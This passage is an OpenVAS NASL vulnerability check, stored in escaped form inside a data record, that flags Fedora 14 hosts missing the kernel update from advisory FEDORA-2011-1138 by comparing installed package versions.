USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-February/053901.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862842\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-11 13:26:17 +0100 (Fri, 11 Feb 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-1138\");\n script_cve_id(\"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\", \"CVE-2010-4165\", \"CVE-2011-0521\", \"CVE-2010-4346\", \"CVE-2010-4649\", \"CVE-2011-0006\", \"CVE-2010-4648\", \"CVE-2010-4163\");\n script_name(\"Fedora Update for kernel FEDORA-2011-1138\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.11~83.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
